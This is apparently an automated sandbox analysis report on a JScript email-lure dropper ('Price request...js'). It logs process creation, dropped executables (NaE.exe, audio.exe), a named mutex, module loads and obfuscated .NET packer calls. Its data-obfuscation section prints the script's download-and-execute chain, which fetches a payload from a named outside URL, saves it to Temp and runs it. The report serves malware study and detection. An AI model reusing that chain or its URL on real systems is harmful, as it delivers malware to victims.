                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\IDWYPJ.jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCommand line argument: 08A4_2_00413780
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Price request N#U00b0DEM23000199.jsVirustotal: Detection: 32%
                        Source: Price request N#U00b0DEM23000199.jsReversingLabs: Detection: 15%
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\audio.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                        Source: Binary string: _.pdb source: NaE.exe, 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, NaE.exe, 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        JScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");_Stream.Close();IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\824.js.csv");ITextStream.WriteLine(" entry:1762 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22https%3A%2F%2Fpostutopia.net%2Fwp-includes%2Fimages%2Fsmilies%2Fwp.js%22%2C%20false)%3B%0AObj");IServerXMLHTTPRequest2.open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", "false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/IDWYPJ.js", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp/IDWYPJ.
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\NaE.exe");
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        Source: 4.3.NaE.exe.782700.0.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        Source: 4.2.NaE.exe.21223f6.2.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        Source: 4.2.NaE.exe.22d0f08.3.raw.unpack, aojoPCkCOYi3rvl9Ad.cs.Net Code: Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777398)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777270)),Type.GetTypeFromHandle(X6YvgBJjnl6CDvMOZV.eiiaeCoYi9HaZ(16777336))})
                        .NET source code contains potential unpacker
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, Packet.cs.Net Code: Qqqx1vUcI
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: audio.exe.4.drStatic PE information: real checksum: 0x23bfb should be: 0x3b09a
                        Source: NaE.exe.3.drStatic PE information: real checksum: 0x23bfb should be: 0x3b09a
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_0040E21D push ecx; ret 4_2_0040E230
